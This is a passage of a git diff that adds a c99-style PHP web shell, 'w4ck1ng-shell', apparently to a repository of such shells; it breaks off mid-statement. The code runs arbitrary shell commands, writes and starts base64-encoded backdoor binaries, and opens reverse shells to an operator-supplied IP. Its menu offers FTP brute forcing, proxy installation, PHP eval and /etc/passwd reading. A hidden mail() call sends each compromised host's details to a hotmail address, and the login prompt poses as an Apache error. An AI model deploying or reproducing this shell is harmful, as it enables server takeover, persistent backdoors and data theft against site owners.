/dev/null and b/php/PHPshell/c99_w4cking/c99_w4cking.jpg differ diff --git a/php/PHPshell/c99_w4cking/c99_w4cking.php b/php/PHPshell/c99_w4cking/c99_w4cking.php new file mode 100644 index 0000000..7948a5b --- /dev/null +++ b/php/PHPshell/c99_w4cking/c99_w4cking.php @@ -0,0 +1,2831 @@ +<?php +if (!function_exists("myshellexec")) +{ +if(is_callable("popen")){ +function myshellexec($command) { +if (!($p=popen("($command)2>&1","r"))) { +return 126; +} +while (!feof($p)) { +$line=fgets($p,1000); +$out .= $line; +} +pclose($p); +return $out; +} +}else{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +} + + +function checkproxyhost(){ +$host = getenv("HTTP_HOST"); +$filename = '/tmp/.setan/xh'; +if (file_exists($filename)) { +$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>"; +} else { +$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>"; + } +} + +if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) +{ + $ip = gethostbyname($_SERVER["HTTP_HOST"]); + $por = $_POST['backconnectport']; + if(is_writable(".")){ + cfb("shbd",$backdoor); + ex("chmod 777 shbd"); + $cmd = "./shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data"; + }else{ + cfb("/tmp/shbd",$backdoor); + ex("chmod 777 /tmp/shbd"); + $cmd = "./tmp/shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data"; +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) +{ + if(is_writable(".")){ + cf("back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + if (file_exists("back")) { unlink("back"); } + }else{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + if (file_exists("/tmp/back")) { unlink("/tmp/back"); } +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) +{ + if(is_writable(".")){ + cf("backc",$back_connect_c); + ex("chmod 777 backc"); + //$blah = ex("gcc back.c -o backc"); + $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("backc")) { unlink("backc"); } + }else{ + ex("chmod 777 /tmp/backc"); + cf("/tmp/backc",$back_connect_c); + //$blah = ex("gcc -o /tmp/backc /tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function cfb($fname,$text) +{ + $w_file=@fopen($fname,"w") or bberr(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function err() +{ +$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>"; +} + +function bberr() +{ +$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>"; +} + +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} + +ini_set("memory_limit","300M"); +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}} +error_reporting(5); +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +$r11 = $_SERVER['SERVER_ADDR'];$i94 = $_SERVER['REMOTE_ADDR'];$i71= gethostbyaddr($i94);$h42 = $_SERVER['HTTP_HOST'];$a83 = $_SERVER['REQUEST_URI'];$p77 = __FILE__;$s33 = str_replace('.', '', $r11);$e85 = 'c00lhell@hotmail.com';$f55 = "From: $s33 <c00lhell@hotmail.com>";$m852 = "$i94\n$i71\n\n$h42$a83\n$p77";@mail($e85, $s33, $m852, $f55); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} +$shver = "w4ck1ng-shell (Private Build v0.3)"; +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; +} +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; +} +$surl = htmlspecialchars($surl); +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. +$login = ""; +$pass = ""; +$md5_pass = ""; +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Apache Error: Restricted File"; +$accessdeniedmess = "access denied"; +$gzipencode = TRUE; +$filestealth = TRUE; //if TRUE, don't change modify- and access-time +$donated_html = ""; +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. +$curdir = "./"; +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; +$tmpdir_log = "./"; +$log_email = "c00lhell@hotmail.com"; +$sort_default = "0a"; +$sort_save = TRUE; +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example + array("config.php",1) // example +); +$safemode_diskettes = array("a"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + + +$sess_cookie = "c99shvars"; // Cookie-variable name + + + +//Quick launch +$quicklaunch = array( + array("<hr><b>[Home]</b>",$surl), + array("<b>[Search]</b>",$surl."act=search&d=%d"), + array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"), + array("<b>[Processes]</b>",$surl."act=processes&d=%d"), + array("<b>[FTP Brute Forcer]</b>",$surl."act=ftpquickbrute&d=%d"), + array("<b>[Server Information]</b>",$surl."act=security&d=%d"), + array("<b>[SQL Manager]</b>",$surl."act=sql&d=%d"), + array("<b>[Eval PHP code]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"), + array("<b>[Back-Connection]</b>",$surl."act=backc"), + array("<b>[Self remove]</b>",$surl."act=selfremove"), + array("<b>[Install Proxy]</b>",$surl."act=proxy"), + array("<b>[Backdoor Host]</b>",$surl."act=shbd"), +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img"){ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} + elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} + else {return "<font color=green>".view_perms(fileperms($o))."</font>";} +} +} +if (!function_exists("mysql_dump")){ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by ".$shver." +# Home page: http://w4ck1ng.com +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; + if ($tbl_struct) + { + echo "<td valign=\"top\"><b>Fields:</b><br>"; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "?<a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} + echo "</td></tr></table>"; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "<font color=red>ON (secure)</font>"; +} +else {$safemode 